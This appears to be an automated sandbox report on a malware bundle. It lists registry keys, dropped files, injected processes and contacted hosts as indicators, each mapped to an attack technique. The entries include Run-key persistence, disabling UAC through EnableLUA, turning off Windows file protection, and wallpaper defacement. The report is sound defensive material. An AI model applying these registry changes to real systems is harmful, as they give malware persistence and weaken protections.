Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook	sjhkhda.exe
Key queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key opened	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook	sjhkhda.exe
Key queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook	sjhkhda.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	sjhkhda.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook	sjhkhda.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key opened	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook	sjhkhda.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

!FIXInj.exeselfaware.exeqmrkzlocgnnaroc.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .."	!FIXInj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .."	!FIXInj.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\77511e5d-9ef3-4d85-bc36-b2cb40bd6f0e\\selfaware.exe\" --AutoStart"	selfaware.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ugbzjedq = "ooezvphdfx.exe"	qmrkzlocgnnaroc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sbgkfeaq = "qmrkzlocgnnaroc.exe"	qmrkzlocgnnaroc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "vrzzpxqgisjoe.exe"	qmrkzlocgnnaroc.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

Rover.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Rover.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Rover.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

fvqnkqqa.exefvqnkqqa.exeooezvphdfx.exeexplorer.exe

description	ioc	process
File opened (read-only)	\??\b:	fvqnkqqa.exe
File opened (read-only)	\??\r:	fvqnkqqa.exe
File opened (read-only)	\??\s:	ooezvphdfx.exe
File opened (read-only)	\??\k:	fvqnkqqa.exe
File opened (read-only)	\??\p:	fvqnkqqa.exe
File opened (read-only)	\??\r:	fvqnkqqa.exe
File opened (read-only)	\??\t:	ooezvphdfx.exe
File opened (read-only)	\??\u:	ooezvphdfx.exe
File opened (read-only)	\??\z:	fvqnkqqa.exe
File opened (read-only)	\??\s:	fvqnkqqa.exe
File opened (read-only)	\??\m:	fvqnkqqa.exe
File opened (read-only)	\??\u:	fvqnkqqa.exe
File opened (read-only)	\??\w:	fvqnkqqa.exe
File opened (read-only)	\??\y:	fvqnkqqa.exe
File opened (read-only)	\??\o:	fvqnkqqa.exe
File opened (read-only)	\??\q:	fvqnkqqa.exe
File opened (read-only)	\??\m:	fvqnkqqa.exe
File opened (read-only)	\??\i:	ooezvphdfx.exe
File opened (read-only)	\??\w:	ooezvphdfx.exe
File opened (read-only)	\??\l:	fvqnkqqa.exe
File opened (read-only)	\??\t:	fvqnkqqa.exe
File opened (read-only)	\??\a:	fvqnkqqa.exe
File opened (read-only)	\??\k:	fvqnkqqa.exe
File opened (read-only)	\??\g:	ooezvphdfx.exe
File opened (read-only)	\??\j:	ooezvphdfx.exe
File opened (read-only)	\??\x:	ooezvphdfx.exe
File opened (read-only)	\??\y:	ooezvphdfx.exe
File opened (read-only)	\??\t:	fvqnkqqa.exe
File opened (read-only)	\??\w:	fvqnkqqa.exe
File opened (read-only)	\??\j:	fvqnkqqa.exe
File opened (read-only)	\??\v:	fvqnkqqa.exe
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\u:	fvqnkqqa.exe
File opened (read-only)	\??\a:	fvqnkqqa.exe
File opened (read-only)	\??\h:	fvqnkqqa.exe
File opened (read-only)	\??\q:	fvqnkqqa.exe
File opened (read-only)	\??\z:	fvqnkqqa.exe
File opened (read-only)	\??\a:	ooezvphdfx.exe
File opened (read-only)	\??\o:	ooezvphdfx.exe
File opened (read-only)	\??\p:	ooezvphdfx.exe
File opened (read-only)	\??\s:	fvqnkqqa.exe
File opened (read-only)	\??\p:	fvqnkqqa.exe
File opened (read-only)	\??\v:	fvqnkqqa.exe
File opened (read-only)	\??\i:	fvqnkqqa.exe
File opened (read-only)	\??\v:	ooezvphdfx.exe
File opened (read-only)	\??\g:	fvqnkqqa.exe
File opened (read-only)	\??\h:	fvqnkqqa.exe
File opened (read-only)	\??\n:	fvqnkqqa.exe
File opened (read-only)	\??\x:	fvqnkqqa.exe
File opened (read-only)	\??\e:	fvqnkqqa.exe
File opened (read-only)	\??\g:	fvqnkqqa.exe
File opened (read-only)	\??\e:	ooezvphdfx.exe
File opened (read-only)	\??\h:	ooezvphdfx.exe
File opened (read-only)	\??\k:	ooezvphdfx.exe
File opened (read-only)	\??\m:	ooezvphdfx.exe
File opened (read-only)	\??\n:	ooezvphdfx.exe
File opened (read-only)	\??\q:	ooezvphdfx.exe
File opened (read-only)	\??\b:	fvqnkqqa.exe
File opened (read-only)	\??\n:	fvqnkqqa.exe
File opened (read-only)	\??\o:	fvqnkqqa.exe
File opened (read-only)	\??\e:	fvqnkqqa.exe
File opened (read-only)	\??\i:	fvqnkqqa.exe
File opened (read-only)	\??\r:	ooezvphdfx.exe
File opened (read-only)	\??\z:	ooezvphdfx.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

77 raw.githubusercontent.com
78 raw.githubusercontent.com
129 discord.com
130 discord.com
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

79 ip-api.com
169 api.2ip.ua
170 api.2ip.ua
238 api.ipify.org
248 api.2ip.ua

flow	ioc
77	raw.githubusercontent.com
78	raw.githubusercontent.com
129	discord.com
130	discord.com

flow	ioc
79	ip-api.com
169	api.2ip.ua
170	api.2ip.ua
238	api.ipify.org
248	api.2ip.ua

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

ooezvphdfx.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCScan = "0"	ooezvphdfx.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable = "4294967197"	ooezvphdfx.exe

AutoIT Executable 4 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\f3cb220f1aaa32ca310586e5f62dcab1.pack	autoit_exe
C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\ac3.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\jaffa.exe	autoit_exe
C:\Windows\SysWOW64\ooezvphdfx.exe	autoit_exe

Drops file in System32 directory 44 IoCs

Processes:

insdrv.exejaffa.exefvqnkqqa.exeDrvInst.exeDrvInst.exeooezvphdfx.exefvqnkqqa.exeinsdrv.exe

description	ioc	process
File created	C:\Windows\System32\DriverStore\FileRepository\droidcam.inf_amd64_c14a386568f95d09\droidcam.PNF	insdrv.exe
File opened for modification	C:\Windows\SysWOW64\ooezvphdfx.exe	jaffa.exe
File created	\??\c:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc.exe	fvqnkqqa.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{3e05d842-2d8d-9540-a475-72b00e0aece0}\SET76A2.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\drvstore.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\droidcam.inf_amd64_c14a386568f95d09\droidcam.cat	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\droidcam.inf_amd64_c14a386568f95d09\droidcam.inf	DrvInst.exe
File opened for modification	C:\Windows\SysWOW64\msvbvm60.dll	ooezvphdfx.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{3e05d842-2d8d-9540-a475-72b00e0aece0}\droidcamvideo.cat	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{3e05d842-2d8d-9540-a475-72b00e0aece0}\SET76A3.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\drvstore.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{efeaaa63-2f24-3d45-81ed-1dccbdeca63d}\droidcam.sys	DrvInst.exe
File created	C:\Windows\SysWOW64\qmrkzlocgnnaroc.exe	jaffa.exe
File created	C:\Windows\SysWOW64\fvqnkqqa.exe	jaffa.exe
File opened for modification	C:\Windows\SysWOW64\fvqnkqqa.exe	jaffa.exe
File created	C:\Windows\SysWOW64\vrzzpxqgisjoe.exe	jaffa.exe
File created	C:\Windows\System32\DriverStore\Temp\{3e05d842-2d8d-9540-a475-72b00e0aece0}\SET76A4.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{efeaaa63-2f24-3d45-81ed-1dccbdeca63d}\SET78C5.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\droidcam.inf_amd64_c14a386568f95d09\droidcam.sys	DrvInst.exe
File created	C:\Windows\SysWOW64\ooezvphdfx.exe	jaffa.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\droidcamvideo.inf_amd64_47e18363cbf3dfe0\droidcamvideo.inf	DrvInst.exe
File opened for modification	C:\Windows\SysWOW64\qmrkzlocgnnaroc.exe	jaffa.exe
File opened for modification	C:\Windows\SysWOW64\vrzzpxqgisjoe.exe	jaffa.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{3e05d842-2d8d-9540-a475-72b00e0aece0}\droidcamvideo.inf	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{3e05d842-2d8d-9540-a475-72b00e0aece0}\droidcamvideo.sys	DrvInst.exe
File opened for modification	\??\c:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc.exe	fvqnkqqa.exe
File opened for modification	\??\c:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc.exe	fvqnkqqa.exe
File created	C:\Windows\System32\DriverStore\Temp\{efeaaa63-2f24-3d45-81ed-1dccbdeca63d}\SET78C6.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{efeaaa63-2f24-3d45-81ed-1dccbdeca63d}\droidcam.inf	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{3e05d842-2d8d-9540-a475-72b00e0aece0}\SET76A3.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\droidcamvideo.inf_amd64_47e18363cbf3dfe0\droidcamvideo.sys	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\droidcamvideo.inf_amd64_47e18363cbf3dfe0\droidcamvideo.cat	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{3e05d842-2d8d-9540-a475-72b00e0aece0}	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{efeaaa63-2f24-3d45-81ed-1dccbdeca63d}\SET78C7.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{efeaaa63-2f24-3d45-81ed-1dccbdeca63d}\SET78C7.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{3e05d842-2d8d-9540-a475-72b00e0aece0}\SET76A2.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{3e05d842-2d8d-9540-a475-72b00e0aece0}\SET76A4.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{efeaaa63-2f24-3d45-81ed-1dccbdeca63d}\SET78C5.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{efeaaa63-2f24-3d45-81ed-1dccbdeca63d}\droidcam.cat	DrvInst.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\droidcamvideo.inf_amd64_47e18363cbf3dfe0\droidcamvideo.PNF	insdrv.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{efeaaa63-2f24-3d45-81ed-1dccbdeca63d}\SET78C6.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{efeaaa63-2f24-3d45-81ed-1dccbdeca63d}	DrvInst.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exeCLWCP.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\%username%\\Desktop\\t\\a\\bg.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\Desktop\Wallpaper = "c:\\temp\\bg.bmp"	CLWCP.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

selfaware.exesjhkhda.exeselfaware.exe

description	pid	process	target process
PID 2932 set thread context of 6304	2932	selfaware.exe	selfaware.exe
PID 5244 set thread context of 4348	5244	sjhkhda.exe	sjhkhda.exe
PID 6100 set thread context of 4220	6100	selfaware.exe	selfaware.exe

Drops file in Program Files directory 64 IoCs

Processes:

Rover.exefvqnkqqa.exe

description	ioc	process
File created	C:\Program Files (x86)\rover\Eat\Eat.070.png	Rover.exe
File created	C:\Program Files (x86)\rover\Eat\Eat.052.png	Rover.exe
File created	C:\Program Files (x86)\rover\Attention.wav	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Eat\Eat.050.png	Rover.exe
File created	C:\Program Files (x86)\rover\_9Idle\_9Idle.016.png	Rover.exe
File created	C:\Program Files (x86)\rover\Lick\Lick.005.png	Rover.exe
File created	C:\Program Files (x86)\rover\RU_other.txt	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Exit\Exit.023.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\_10Idle\_10Idle.005.png	Rover.exe
File created	C:\Program Files (x86)\rover\Come\Come.012.png	Rover.exe
File created	C:\Program Files (x86)\rover\Eat\Eat.075.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\_3Idle\_3Idle.004.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Whine.wav	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Reading\Reading.020.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\End_Speak\End_Speak.001.png	Rover.exe
File created	C:\Program Files (x86)\rover\Snoring.wav	Rover.exe
File created	C:\Program Files (x86)\rover\_2Idle\_2Idle.013.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\_10Idle\_10Idle.026.png	Rover.exe
File created	C:\Program Files (x86)\rover\Lick\Lick.002.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Reading\Reading.009.png	Rover.exe
File created	C:\Program Files (x86)\rover\_7Idle\_7Idle.024.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Lick\Lick.006.png	Rover.exe
File created	C:\Program Files (x86)\rover\Eat\Eat.011.png	Rover.exe
File created	C:\Program Files (x86)\rover\Eat\Eat.017.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Eat\Eat.069.png	Rover.exe
File created	C:\Program Files (x86)\rover\Exit\Exit.006.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Exit\Exit.013.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\_3Idle\_3Idle.014.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Ashamed\Ashamed.025.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Eat\Eat.052.png	Rover.exe
File created	C:\Program Files (x86)\rover\Exit\Exit.001.png	Rover.exe
File created	C:\Program Files (x86)\rover\_5Idle\_5Idle.008.png	Rover.exe
File created	C:\Program Files (x86)\rover\_6Idle\_6Idle.001.png	Rover.exe
File created	C:\Program Files (x86)\rover\_10Idle\_10Idle.015.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Eat\Eat.074.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\GetAttention\GetAttention.002.png	Rover.exe
File created	C:\Program Files (x86)\rover\_9Idle\_9Idle.025.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\RU_gdi.txt	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\_5Idle\_5Idle.015.png	Rover.exe
File created	C:\Program Files (x86)\rover\_10Idle\_10Idle.011.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\_10Idle\_10Idle.031.png	Rover.exe
File created	C:\Program Files (x86)\rover\Reading\Reading.003.png	Rover.exe
File created	C:\Program Files (x86)\rover\Come\Come.002.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\_5Idle\_5Idle.018.png	Rover.exe
File created	C:\Program Files (x86)\rover\_8Idle\_8Idle.007.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\_9Idle\_9Idle.003.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Speak\Speak.014.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\_8Idle\_8Idle.002.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\_10Idle\_10Idle.006.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Tired\Tired.010.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Eat\Eat.054.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Exit\Exit.010.png	Rover.exe
File created	C:\Program Files (x86)\rover\_3Idle\_3Idle.012.png	Rover.exe
File created	C:\Program Files (x86)\rover\_5Idle\_5Idle.011.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\_9Idle\_9Idle.006.png	Rover.exe
File created	C:\Program Files (x86)\rover\Reading\Reading.013.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Eat\Eat.011.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\_8Idle\_8Idle.007.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\_10Idle\_10Idle.028.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Slip.wav	Rover.exe
File opened for modification	\??\c:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC.exe	fvqnkqqa.exe
File opened for modification	C:\Program Files (x86)\rover\Come\Come.013.png	Rover.exe
File created	C:\Program Files (x86)\rover\Eat\Eat.038.png	Rover.exe
File opened for modification	C:\Program Files (x86)\rover\Eat\Eat.065.png	Rover.exe

Drops file in Windows directory 29 IoCs

Processes:

DrvInst.exefvqnkqqa.exefvqnkqqa.exeinsdrv.exeinsdrv.exeDrvInst.exeDrvInst.exeDrvInst.exejaffa.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File opened for modification	\??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.1_none_c3bc3dbd94da3c61\MsoIrmProtector.doc.exe	fvqnkqqa.exe
File created	\??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.746_none_ebc47b06544bfaab\MsoIrmProtector.doc.exe	fvqnkqqa.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	insdrv.exe
File created	\??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.746_none_ebc47b06544bfaab\MsoIrmProtector.doc.exe	fvqnkqqa.exe
File created	\??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.746_none_f619255888acbca6\MsoIrmProtector.doc.exe	fvqnkqqa.exe
File opened for modification	\??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.746_none_f619255888acbca6\MsoIrmProtector.doc.exe	fvqnkqqa.exe
File opened for modification	\??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.1_none_c3bc3dbd94da3c61\MsoIrmProtector.doc.exe	fvqnkqqa.exe
File opened for modification	\??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.746_none_ebc47b06544bfaab\MsoIrmProtector.doc.exe	fvqnkqqa.exe
File created	\??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.1_none_ce10e80fc93afe5c\MsoIrmProtector.doc.exe	fvqnkqqa.exe
File opened for modification	\??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.746_none_f619255888acbca6\MsoIrmProtector.doc.exe	fvqnkqqa.exe
File created	C:\Windows\INF\c_media.PNF	insdrv.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File opened for modification	C:\Windows\inf\oem3.inf	DrvInst.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	insdrv.exe
File created	C:\Windows\inf\oem4.inf	DrvInst.exe
File opened for modification	\??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.746_none_ebc47b06544bfaab\MsoIrmProtector.doc.exe	fvqnkqqa.exe
File opened for modification	\??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.1_none_ce10e80fc93afe5c\MsoIrmProtector.doc.exe	fvqnkqqa.exe
File opened for modification	C:\Windows\mydoc.rtf	jaffa.exe
File opened for modification	\??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.1_none_ce10e80fc93afe5c\MsoIrmProtector.doc.exe	fvqnkqqa.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	svchost.exe
File opened for modification	C:\Windows\inf\oem4.inf	DrvInst.exe
File created	\??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.746_none_f619255888acbca6\MsoIrmProtector.doc.exe	fvqnkqqa.exe
File created	C:\Windows\inf\oem3.inf	DrvInst.exe
File created	\??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.1_none_c3bc3dbd94da3c61\MsoIrmProtector.doc.exe	fvqnkqqa.exe
File created	\??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.1_none_c3bc3dbd94da3c61\MsoIrmProtector.doc.exe	fvqnkqqa.exe
File created	\??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.1_none_ce10e80fc93afe5c\MsoIrmProtector.doc.exe	fvqnkqqa.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

5952 3256 WerFault.exe 3.exe
6480 5852 WerFault.exe packer.exe
6628 928 WerFault.exe 3.exe

pid	pid_target	process	target process
5952	3256	WerFault.exe	3.exe
6480	5852	WerFault.exe	packer.exe
6628	928	WerFault.exe	3.exe

NSIS installer 4 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\bloatware\1.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\bloatware\1.exe	nsis_installer_2
C:\Program Files (x86)\DroidCam\Uninstall.exe	nsis_installer_1
C:\Program Files (x86)\DroidCam\Uninstall.exe	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

insdrv.exeexplorer.exesvchost.exeDrvInst.exeDrvInst.exeinsdrv.exeDrvInst.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom	insdrv.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	DrvInst.exe
